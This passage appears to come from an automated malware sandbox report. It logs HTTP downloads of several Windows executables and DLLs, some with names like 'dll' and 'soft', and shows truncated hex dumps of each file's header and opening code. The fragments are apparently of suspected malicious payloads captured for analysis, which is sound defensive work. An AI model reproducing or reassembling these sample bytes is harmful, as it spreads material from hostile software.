00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:54:19 GMTContent-Type: application/octet-streamContent-Length: 2812928Last-Modified: Fri, 13 Dec 2024 17:37:12 GMTConnection: keep-aliveETag: "675c70c8-2aec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 ba f6 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 77 6f 61 65 72 63 69 00 a0 2a 00 00 a0 00 00 00 8c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 72 65 78 76 78 71 75 00 20 00 00 00 40 2b 00 00 04 00 00 00 c6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 ca 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:54:27 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Thu, 12 Dec 2024 19:26:08 GMTETag: "3600-62917afb02b04"Accept-Ranges: bytesContent-Length: 13824Vary: Accept-EncodingContent-Type: text/plainData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd 13 62 da 89 72 0c 89 89 72 0c 89 89 72 0c 89 75 52 1e 89 88 72 0c 89 07 6d 1f 89 ca 72 0c 89 52 69 63 68 89 72 0c 89 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e4 51 e5 5b 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 05 0c 00 1e 00 00 00 14 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 80 31 00 00 43 00 00 00 38 30 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 1c 00 00 00 10 00 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c3 01 00 00 00 30 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 0e 00 00 00 40 00 00 00 10 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 ea 01 00 00 00 50 00 00 00 02 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:54:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 13 Dec 2024 17:54:30 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:54:37 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:54:40 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 17:54:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
